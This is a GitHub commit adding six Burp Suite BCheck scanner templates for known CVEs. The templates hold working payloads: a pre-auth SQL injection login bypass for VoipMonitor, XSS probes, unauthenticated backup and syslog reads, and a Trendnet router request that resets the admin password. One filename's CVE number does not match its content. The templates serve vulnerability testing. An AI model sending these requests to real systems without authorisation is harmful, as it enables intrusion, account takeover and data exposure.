-
Notifications
You must be signed in to change notification settings - Fork 110
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck
- Loading branch information
1 parent
f89cb49
commit dabd08f
Showing
6 changed files
with
156 additions
and
0 deletions.
There are no files selected for viewing
26 changes: 26 additions & 0 deletions
26
vulnerabilities-CVEd/CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2022-24260 VoipMonitor - Pre-Auth SQL Injection" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2022-24260." | ||
tags: "CVE-2022-24260" | ||
|
||
define: | ||
potential_path = "/api.php" | ||
|
||
given host then | ||
send request called check: | ||
method: "POST" | ||
replacing headers: | ||
"Content-Type": "application/x-www-form-urlencoded", | ||
"Accept": "*/*" | ||
path: {potential_path} | ||
body: "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #" | ||
|
||
if {check.response.status_code} is "200" and "\"success\":true" in {check.response.body} and "_vm_version" in {check.response.body} and "_debug" in {check.response.body} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level." | ||
remediation: "Upgrade VoipMonitor to the latest version or input validation and parametrized queries including prepared statements." | ||
end if |
23 changes: 23 additions & 0 deletions
23
vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting" | ||
author: "Parimal Shaw" | ||
description: "Checks for CVE-2023-36346" | ||
tags: "CVE-2023-36346" | ||
|
||
define: | ||
potential_path = "/print.php?nm_member=<script>alert(document.location)</script>" | ||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" and "<script>alert(document.location)</script>" in {check.response.body} and "<title>print</title>" in {check.response.body} and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php." | ||
remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." | ||
end if |
24 changes: 24 additions & 0 deletions
24
vulnerabilities-CVEd/CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-20114 TCExam <= 14.8.1 - Sensitive Information Exposure" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2021-20114" | ||
tags: "CVE-2021-20114" | ||
|
||
define: | ||
potential_path = "/cache/backup/" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" and "Index of /cache/backup" in {check.response.body} and "Parent Directory" in {check.response.body} and ".sql.gz" in {check.response.body} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. Among other things, these backup files contain usernames, password hashes and other user information that was supplied on signup." | ||
remediation: "It is Recommended to Upgrade to latest version or disable directory listing." | ||
end if |
34 changes: 34 additions & 0 deletions
34
vulnerabilities-CVEd/CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-20158 Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2021-20158." | ||
tags: "CVE-2021-20158" | ||
|
||
run for each: | ||
potential_body = | ||
"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=Admin@123", | ||
"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=QWRtaW5AMTIz&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=" | ||
|
||
define: | ||
potential_path = "/apply_sec.cgi" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "POST" | ||
path: {potential_path} | ||
body: {potential_body} | ||
|
||
if {check.response.status_code} is "200" | ||
and "setConnectDevice" in {check.response.body} | ||
and "setInternet" in {check.response.body} | ||
and "setWlanSSID" in {check.response.body} | ||
and "TEW-827DRU" in {check.response.body} | ||
and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: high | ||
confidence: certain | ||
detail: "Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.(Currently the admin Password have been chnaged to 'Admin@123')" | ||
remediation: "Upgrade to Latest Version or implement proper access control to the following command" | ||
end if |
27 changes: 27 additions & 0 deletions
27
vulnerabilities-CVEd/CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2021-21816 D-Link DIR-3040 1.13B03 - Information Disclosure" | ||
author: "Parimal Shaw" | ||
description: "Check For CVE-2021-21816" | ||
tags: "CVE-2021-21816" | ||
|
||
define: | ||
potential_path = "/messages" | ||
|
||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
|
||
if {check.response.status_code} is "200" | ||
and "syslog:" in {check.response.body} | ||
and "admin" in {check.response.body} | ||
and "/etc_ro/lighttpd/www" in {check.response.body} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations." | ||
remediation: "Proper Access Control should be implemented." | ||
end if |
22 changes: 22 additions & 0 deletions
22
...rabilities-CVEd/CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,22 @@ | ||
metadata: | ||
language: v1-beta | ||
name: "CVE-2022-0150 WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting" | ||
author: "Parimal Shaw" | ||
description: "Check for CVE-2022-0150." | ||
tags: "CVE-2022-0150" | ||
|
||
define: | ||
potential_path = "/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v" | ||
|
||
given host then | ||
send request called check: | ||
method: "GET" | ||
path: {potential_path} | ||
|
||
if {check.response.status_code} is "200" and "var wah_target_src = '';alert(document.domain);//';" in {check.response.body} and "text/html" in {check.response.headers} then | ||
report issue: | ||
severity: medium | ||
confidence: certain | ||
detail: "WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page." | ||
remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." | ||
end if |